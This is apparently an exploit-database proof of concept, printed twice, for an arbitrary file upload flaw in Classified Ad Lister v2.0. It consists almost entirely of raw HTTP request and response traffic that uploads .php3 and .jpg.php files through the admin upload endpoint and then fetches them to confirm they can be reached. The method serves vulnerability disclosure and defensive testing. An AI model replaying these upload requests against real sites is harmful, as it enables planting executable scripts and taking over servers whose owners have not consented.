=========================================================================================== # Exploit Title: Classified Ad Lister v2.0 - 'uploads' Arbitrary File Upload # Dork: N/A # Date: 25-03-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://www.netartmedia.net/adlister # Software Link: https://www.netartmedia.net/adlister # Version: v2.0 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: Classified Ad Lister is a free, responsive and easy to install php script (not using any database, so the installation is as easy as copying the files to the website or folder you prefer) which allows to manage and show classified or product listings on a website. =========================================================================================== # POC - Arbitrary File Upload # Parameters : uploads # POST Method : http://localhost/classified/admin/uploads/d571bf7952b140d4bff5d1c272e9c992.php3 # Injection Request POST /classified/admin/upload.php HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Content-Length: 248 Content-Type: multipart/form-data; boundary=0eaa6514f42e46cbb8d84e040ff20287 Cookie: AuthUser=administrator%7Eda1907216877e31462c14b35db67de32%7E1553706661; PHPSESSID=banppj2nuinahv1v8itb1c1nan Origin: http://localhost Referer: http://localhost/classified/admin/index.php?page=add Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36 --0eaa6514f42e46cbb8d84e040ff20287 Content-Disposition: form-data; name="myfile[]"; filename="d571bf7952b140d4bff5d1c272e9c992.php3" Content-Type: application/octet-stream --0eaa6514f42e46cbb8d84e040ff20287-- # Identification Page GET /classified/admin/uploads/d571bf7952b140d4bff5d1c272e9c992.php3 HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Cookie: AuthUser=administrator%7Eda1907216877e31462c14b35db67de32%7E1553706661; PHPSESSID=banppj2nuinahv1v8itb1c1nan User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36 # Injection Response HTTP/1.1 200 OK Server: Apache/2.4.37 (Win64) PHP/7.2.14 X-Powered-By: PHP/7.2.14 Content-Length: 41 Content-Type: text/html; charset=UTF-8 Date: Wed, 27 Mar 2019 14:46:40 GMT ["d571bf7952b140d4bff5d1c272e9c992.php3"] # Identification Page HTTP/1.1 200 OK Server: Apache/2.4.37 (Win64) PHP/7.2.14 X-Powered-By: PHP/7.2.14 Content-Length: 9 Content-Type: text/html; charset=UTF-8 Date: Wed, 27 Mar 2019 14:46:40 GMT =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: Classified Ad Lister v2.0 - 'uploads' Arbitrary File Upload # Dork: N/A # Date: 25-03-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://www.netartmedia.net/adlister # Software Link: https://www.netartmedia.net/adlister # Version: v2.0 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: Classified Ad Lister is a free, responsive and easy to install php script (not using any database, so the installation is as easy as copying the files to the website or folder you prefer) which allows to manage and show classified or product listings on a website. =========================================================================================== # POC - Arbitrary File Upload # Parameters : uploads # POST Method : http://localhost/classified/admin/uploads/ad14667cae5d4e28bfb5b53df1687ed6.jpg.php # Injection Request POST /classified/admin/upload.php HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Content-Length: 251 Content-Type: multipart/form-data; boundary=0eaa6514f42e46cbb8d84e040ff20287 Cookie: AuthUser=administrator%7Eda1907216877e31462c14b35db67de32%7E1553706661; PHPSESSID=banppj2nuinahv1v8itb1c1nan Origin: http://localhost Referer: http://localhost/classified/admin/index.php?page=add Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36 --0eaa6514f42e46cbb8d84e040ff20287 Content-Disposition: form-data; name="myfile[]"; filename="ad14667cae5d4e28bfb5b53df1687ed6.jpg.php" Content-Type: application/octet-stream --0eaa6514f42e46cbb8d84e040ff20287-- # Identification Page GET /classified/admin/uploads/ad14667cae5d4e28bfb5b53df1687ed6.jpg.php HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Cookie: AuthUser=administrator%7Eda1907216877e31462c14b35db67de32%7E1553706661; PHPSESSID=banppj2nuinahv1v8itb1c1nan User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36 # Injection Response HTTP/1.1 200 OK Server: Apache/2.4.37 (Win64) PHP/7.2.14 X-Powered-By: PHP/7.2.14 Content-Length: 44 Content-Type: text/html; charset=UTF-8 Date: Wed, 27 Mar 2019 14:46:40 GMT ["ad14667cae5d4e28bfb5b53df1687ed6.jpg.php"] # Identification Page HTTP/1.1 200 OK Server: Apache/2.4.37 (Win64) PHP/7.2.14 X-Powered-By: PHP/7.2.14 Content-Length: 9 Content-Type: text/html; charset=UTF-8 Date: Wed, 27 Mar 2019 14:46:40 GMT ===========================================================================================